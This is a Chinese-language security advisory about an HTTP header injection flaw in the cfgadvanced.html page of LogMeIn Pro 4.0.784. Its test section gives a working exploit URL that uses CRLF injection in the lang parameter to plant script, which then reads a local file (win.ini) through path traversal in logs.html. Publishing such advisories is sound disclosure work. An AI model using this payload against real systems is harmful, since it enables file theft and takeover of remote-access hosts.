发布日期：2009-06-05
更新日期：2009-06-08

受影响系统：

LogMeIn, Inc. LogMeIn Pro 4.0.784

描述：

---

BUGTRAQ  ID: 35236

LogMeIn是流行的远程访问软件，允许通过网络控制计算机。

LogMeIn的cfgadvanced.html页面存在HTTP头注入漏洞。如果用户受骗跟随了恶意链接并收到了lang参数，LogMeIn会将lang参数值储存在[HKEY_LOCAL_MACHINE\SOFTWARE\LogMeIn\V5\Appearance\Language]注册表中，并在每次点击链接的时候在Content-Language头中使用，因此特制参数可能导致注入并执行任意代码。

<*来源：Inferno
  
  链接：http://securethoughts.com/2009/06/multiple-vulnerabilities-in-logmein-web-interface-can-be-used-to-control-your-computer-and-steal-arbitary-files/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

https://localhost:2002/cfgadvanced.html?op=update&DisconnectExisting=1&NoHttpCompr=1&CrashDumpInfo=0&lang=en-US%0D%0A%0D%0A%3Chtml%3E%3Cbody%3E%3C/body%3E%3CSCRIPT%3Evar%20ifr%3Dnull%3Bfunction%20al%28%29%7Bvar%20str%3D%28window.frames%5B0%5D.document.body.innerHTML%20%7C%7C%20ifr.contentDocument.documentElement.innerHTML%29%3Balert%28str.substring%28%28str.toLowerCase%28%29%29.indexOf%28%22%3Clegend%3E%22%2C400%29%29%29%3B%7D%20if%28window.location.href.match%28/.*cfgad.*/%29%29%7Bifr%3Ddocument.createElement%28%22iframe%22%29%3Bifr.src%3D%22https%3A//localhost%3A2002/logs.html%3Flog%3D../../../windows/win.ini%22%3Bdocument.body.appendChild%28ifr%29%3BsetTimeout%28%22al%28%29%22%2C4000%29%3B%7D%3C/script%3E%3C%21--

建议：

---

厂商补丁：

LogMeIn, Inc.
-------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

https://secure.logmein.com/home.asp?lang=en

浏览次数：2844
严重程度：0（网友投票）